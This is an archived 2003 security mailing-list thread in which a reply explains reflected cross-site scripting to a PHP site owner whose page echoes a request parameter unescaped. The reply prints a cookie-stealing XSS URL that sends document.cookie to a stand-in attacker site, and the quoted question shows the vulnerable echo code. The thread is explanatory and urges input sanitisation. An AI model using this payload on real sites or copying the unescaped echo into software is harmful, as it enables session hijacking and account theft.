Security Basics mailing list archives
Re: About malicious java sciprt running...
From: Shaun Colley <shaunige () yahoo co uk>
Date: Tue, 9 Dec 2003 19:09:04 +0000 (GMT)
Hey. Having the ability to inject malicious HTML code (or as some call them, "cross-site scripting attacks") is not directly an issue to the security of the server side, but can consequently lead onto the compromisation of the server's security. Here's an example: The attacker crafts an URL string containing malicious javascript to give to the variable $a, to redirect the social engineered user who unsuspectingly visits the URL to the attacker's site to steal the user's cookie. http://host/a.php?variable="><script>document.location='http://www.attackersite.com/cookiesteal.cgi? '%20+document.cookie</script> The users cookie is stolen, leaving the attacker with login credentials. Now, this is not directly a threat to the server, rather a potential threat to users of the site. But what if, for example, the attacker persuaded the administrator to click that URL? The administrators session cookie would be stolen, thus resulting in a system compromise. Without the server-side example, the attacker still has the ability to inject malicious code, this still has the door open to a multitude of possibilities...
i think... this is very~~~ common hole in many sites.
Yeap, way to many scripts do not sanitize user-input. Main rule in CGI and web development: do not trust user-input. Thank you for your time. Shaun. --- s970501 () ku edu np wrote: > Hi,
I have a question about javascript exploits. suppose... somebody can put javascript and can run it, what can he do? i have a website running apache/php. some of pages are workin' like this... test.php?a=333 ... <?php ... echo "$a"; ... ?> ... i found anybody can run javascript from this source... like test.php?a=<script>alert("hey")</script> or something else. but what can he do with this hole...? is there anything he can do in server side? is there any javascript can make file or see files in server? i think... this is very~~~ common hole in many sites. thanks...
---------------------------------------------------------------------------
----------------------------------------------------------------------------
________________________________________________________________________ BT Yahoo! Broadband - Save £80 when you order online today. Hurry! Offer ends 21st December 2003. The way the internet was meant to be. http://uk.rd.yahoo.com/evt=21064/*http://btyahoo.yahoo.co.uk --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- About malicious java sciprt running... s970501 (Dec 09)
- Re: About malicious java sciprt running... Shaun Colley (Dec 09)
- Re: About malicious java sciprt running... オマル イスマイル (Dec 10)
- Re: About malicious java sciprt running... Hugo Teso Torío (Dec 10)
- <Possible follow-ups>
- About malicious java sciprt running... Trystano (Dec 09)
- security awareness employee briefings Steve (Dec 10)
- Fw: About malicious java sciprt running... GUs (Dec 10)